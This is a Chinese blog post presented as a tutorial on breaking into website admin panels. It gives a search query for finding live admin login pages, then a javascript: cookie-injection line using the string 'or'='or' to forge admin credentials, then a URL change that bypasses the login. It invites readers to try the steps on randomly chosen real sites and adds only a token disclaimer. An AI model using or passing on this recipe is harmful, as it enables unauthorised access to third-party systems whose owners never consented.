关于简单网站后台攻防技术

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chance2015/article/details/50389646

今天给大家带来一个简单的网站后台入侵的方法,大家可以去试试,若成功入侵了,也请各位不要搞破坏,本教程纯属提供一种方式给大家互相学习交流。

步骤如下:

1.打开浏览器:这里我使用的是360浏览器。

2.百度搜索inurl:szwyadmin/login.asp  出来下面的界面:

3.出来的就是一些网站的后台登录的网址。这里我随意选一个点击进入:

这里我选的是第二个

4.接着我们在我们进入的网站后台登录界面上的搜索框中输入如下代码:

javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));javascript:alert(document.cookie="admindj="+escape("1")); 

然后回车,点击几下确定后。

5.将网址栏中的login.asp改为admin_index.asp 然后回车,即可进入该网站后台。

6.asp编写的网站大部分都可进入。本博客仅提供学习思路,请勿他用。


展开阅读全文

没有更多推荐了,返回首页